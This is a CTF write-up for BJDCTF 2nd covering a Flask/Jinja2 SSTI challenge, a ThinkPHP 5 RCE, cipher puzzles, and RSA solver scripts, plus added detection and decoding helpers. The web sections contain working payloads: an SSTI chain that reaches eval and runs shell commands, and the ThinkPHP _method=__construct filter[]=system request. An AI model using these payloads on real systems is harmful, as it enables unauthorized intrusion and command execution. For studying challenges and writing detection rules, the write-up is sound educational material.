BJDCTF 2nd WP
Introduction
- I did not have much time for this CTF, and I am still a noob anyway, so I only did a few challenges; sharing them here ~ (¯▽¯)
[BJDCTF 2nd]fake google
Knowledge Point: SSTI
- I have been practising web recently, so I did this one first. Testing confirmed a Flask (Jinja2) SSTI; there was not much to it apart from a small trick when finally reading the flag, where the file contents had to be base64-encoded.
- I usually reach eval through warnings.catch_warnings to execute commands, but the most commonly used class did not seem to be findable here, so I looked for another route. First use
{{[].__class__.__mro__[1].__subclasses__()}}
to list the subclasses of the base class, then ctrl+F in the output for a usable class. index() could not be used directly to get its position, so I copied the list out and counted: the index was 169. Then
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}
executed successfully.
- The rest is plain command execution: traverse the directories and read the flag. One thing to note: when reading the flag, the file contents were filtered, so read them base64-encoded:
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo cat /flag| base64").read()')}}
- Finally decode the output to get the flag.
[BJDCTF 2nd]old-hack
Knowledge Point: ThinkPHP5.0.23 remote RCE
- The home page of this challenge already gives the hint: it displays
Powered by THINKPHP5
, which immediately points to the tp5 vulnerabilities. Search for the exp and play it directly:
# ThinkPHP <= 5.0.23; for 5.1.0 <= 5.1.16 the framework's app_debug must be enabled
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
Once that executes successfully, the flag can be read directly from the root directory.
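The two web payload shapes in this writeup (the Jinja2 class walk in fake google and the _method=__construct override in old-hack) are easy to spot on the request side. As an added example that is not part of the original writeup, here are stdlib-only detection rules run over constructed sample log lines; the rule names and the sample lines are my own.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators for the two payload shapes in this writeup.
# Rule names are my own; the patterns mirror what the page's payloads contain.
RULES = {
    # Harmless-looking arithmetic probe used to confirm Jinja2 rendering
    "ssti_probe": re.compile(r"\{\{\s*\d+\s*[*+]\s*\d+\s*\}\}"),
    # Jinja2 object walk from a literal up to builtins / os via __subclasses__
    "ssti_jinja2_chain": re.compile(
        r"\{\{.*?(__class__|__mro__|__subclasses__|__globals__|__builtins__"
        r"|\bpopen\b|\beval\b).*?\}\}", re.S),
    # ThinkPHP 5.0.x request-method override abusing __construct + filter[]
    "thinkphp_method_override": re.compile(
        r"_method=__construct.*?filter\[\]=|filter\[\]=.*?_method=__construct"),
}

# Constructed sample log lines (not real traffic); POST body shown inline after "body=".
SAMPLE_LOG = [
    "GET /?name={{7*7}} HTTP/1.1",
    "GET /?name=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%7D%7D HTTP/1.1",
    "POST / body=_method=__construct&filter[]=system&server[REQUEST_METHOD]=id",
    "GET /?name=Alice%20Smith HTTP/1.1",
]

def classify(line):
    """Return the names of all rules that match one URL-decoded log line."""
    decoded = unquote_plus(line)  # decode once so %7B%7B is seen as {{
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def scan(lines):
    """Map line index -> matched rule names for every suspicious line."""
    report = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            report[i] = hits
    return report

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG).items():
        print(f"line {i}: {', '.join(hits)}")
```

Decoding happens once before matching, so the percent-encoded payload on the second sample line is caught just like the plain one.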
[BJDCTF 2nd] old illiterate
Knowledge Point: brain teaser
- This challenge is a brain-teaser trap: search the text directly and read the clues from the alphabet. Finally, note that the flag is the text with the braces removed.
flag: BJD {Zhe Jiu raincoat embroidery Lai Copernicium Zhijie pride shad Ba}
[BJDCTF 2nd]cat_flag
Knowledge point: Binary string
- I did not get it at first; then I tried treating a chicken as 0 and no chicken as 1, which gives a 01 binary string that converts to ASCII.
[BJDCTF 2nd] spirit proficiency in -y1ng
Knowledge Point: variant pigpen cipher
- A variant pigpen cipher: just compare against the code table and substitute.
[BJDCTF 2nd] Yan Yan Yan language -y1ng
Knowledge Point: Hex, Vigenère cipher
- First convert the hex string back to text, then Vigenère-decrypt it; the key is yanzi.
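The two steps above, hex decoding followed by Vigenère decryption under the key yanzi, as an added worked example (my code, not the author's); the ciphertext is constructed because the page does not reproduce the challenge text.

```python
def vigenere(text, key, decrypt=False):
    """Vigenère over A-Z. Non-letters are kept as-is and do not advance the key;
    the case of each letter is preserved."""
    shifts = [ord(k) - ord("a") for k in key.lower() if k.isalpha()]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, ki = [], 0
    for ch in text:
        if not (ch.isascii() and ch.isalpha()):
            out.append(ch)
            continue
        base = ord("A") if ch.isupper() else ord("a")
        shift = shifts[ki % len(shifts)]
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        ki += 1
    return "".join(out)

def solve(hex_blob, key):
    """Step 1: hex -> text; step 2: Vigenère-decrypt with the key."""
    cleaned = "".join(hex_blob.split())  # tolerate spaces / newlines between bytes
    return vigenere(bytes.fromhex(cleaned).decode("ascii"), key, decrypt=True)

# Constructed sample: "flag" encrypted with key "yanzi" is "dlnf", i.e. hex 646c6e66.
SAMPLE_HEX = "64 6c 6e 66"

if __name__ == "__main__":
    print(solve(SAMPLE_HEX, "yanzi"))
```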
[BJDCTF 2nd]Y1nglish-y1ng
Knowledge Point: Substitution cipher
- Decrypted it directly online, but the flag was not found. The challenge author later released a hint saying that a wrong word should be corrected, and the last word turned out to be Cr4ck.
[BJDCTF 2nd]rsa0
Knowledge: Basic RSA routine, junior-high-school mathematics
- Substitution of equal quantities: from the known p + q and p - q we obtain n and phi, then the inverse d, and finally solve for m.
- exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa0
import gmpy2
from Crypto.Util.number import *
#a=p+q b=p-q
a=17162353559144679042138764130392599487619616736304807356650753313511074468547740997240459020330637407607018451370757739841162760390979956823381951345720928
b=2157944102411263994709908806124613607462762078172843352748093273937884682449698667594757978254948952712563313245682739933249064978139449404711197573108846
c=45301241949589301995180160804303973330820405560962297548184980689249607707456658111351805771592837881785351326731109851752124118781776273507359216672384415019593182742168977641581393719509221130849808495779942628017133428896872236441436256500653209906562574669595813780702154561337014309513479940699909759454
e=13881611
n=(a**2-b**2)//4   # (p+q)^2 - (p-q)^2 = 4pq
phi=n-a+1          # (p-1)(q-1) = pq - (p+q) + 1
d=int(gmpy2.invert(e,phi))
m=pow(c,d,n)
print(long_to_bytes(m))
[BJDCTF 2nd]rsa1
Knowledge Point: same as above
- Again substitution of equal quantities.
- exp:
# -*- coding:utf-8 -*-
# Author : Konmu
# rsa1
from gmpy2 import iroot,invert
from Crypto.Util.number import *
#p**2+q**2=a
a=230282632694523225937051344416173208141003770756289612804807217657804068791542651564838194212104676551997764018460879226166807005433546876007288091996196539309119708193341213288590014759087592722749150747027103386853090111834756105787095305838589646731702172385691220203268855509181738201501713929481838642498
#p-q=b
b=-4900116095386312405990409603053751102044890401512310635193158977344509279780138297206939893571426574257123980641762453196916366832983541826491201092272814
c=57305478781873469701906886706515374864936174293678370148185292603092343152208523838764818066602190494238364695329068029056956741411335604426893391963871703874286120587046383783936896139251516197205626486457338063805605931966769630762887820549045989322171833789694041829203743398401975653722227935420397574254
e=8671291
n=(b**2-a)//(-2)             # (p-q)^2 = p^2+q^2-2pq  =>  pq = (a-b^2)/2
temp=2*n+a                   # (p+q)^2 = p^2+q^2+2pq
temp_1,exact=iroot(temp,2)   # iroot returns (root, is_exact); keep the root
assert exact                 # p+q must be an exact square root
#temp_1=20893877754997573728203567845738001284961182394065350971204621396499968057878195283639697317876340959595444095705767445958979789899779232673349184190305080
print(temp_1)
phi=n-temp_1+1               # (p-1)(q-1) = pq - (p+q) + 1
d=int(invert(e,phi))
m=pow(c,d,n)
print(long_to_bytes(m))
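Both exps above do the same thing: recover n and phi from two symmetric functions of p and q, without factoring anything. As an added example (mine, not the author's code), here is that step in plain Python 3.8+ with no gmpy2 or pycryptodome; it also recovers p and q themselves and checks them, and can be fed the a, b, c, e values from either exp.

```python
from math import isqrt

def _exact_sqrt(x):
    """Integer square root of x, raising if x is not a perfect square."""
    r = isqrt(x)
    if r * r != x:
        raise ValueError("not a perfect square: the leaked relations are inconsistent")
    return r

def pq_from_sum_diff(s, d):
    """rsa0 shape: s = p + q, d = p - q  ->  (p, q) = ((s+d)/2, (s-d)/2)."""
    if (s + d) % 2:
        raise ValueError("p + q and p - q must have the same parity")
    return (s + d) // 2, (s - d) // 2

def pq_from_sumsq_diff(a, d):
    """rsa1 shape: a = p^2 + q^2, d = p - q (d may be negative, as on this page).
    d^2 = a - 2pq      =>  n = (a - d^2) / 2
    (p+q)^2 = a + 2n   =>  p + q = sqrt(a + 2n), then proceed as in rsa0."""
    if (a - d * d) % 2:
        raise ValueError("a - d^2 must be even")
    n = (a - d * d) // 2
    return pq_from_sum_diff(_exact_sqrt(a + 2 * n), d)

def verify(p, q, n):
    """Sanity check before decrypting: both factors > 1 and p*q really is n."""
    return p > 1 and q > 1 and p * q == n

def decrypt(c, e, p, q):
    """Textbook RSA: d = e^-1 mod phi, m = c^d mod n; returns m as big-endian bytes."""
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # Python 3.8+ modular inverse; raises if gcd(e, phi) != 1
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

if __name__ == "__main__":
    # Constructed toy parameters (p=61, q=53, e=17); real challenge values are far larger.
    p, q = pq_from_sumsq_diff(61**2 + 53**2, 61 - 53)
    print(p, q, verify(p, q, 3233), decrypt(pow(65, 17, 3233), 17, p, q))
```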
Summary
- I originally intended to use this opportunity to practise some web, but found that I am still tcl (too much of a noob); I will go through the official WP afterwards to learn some of the web routines.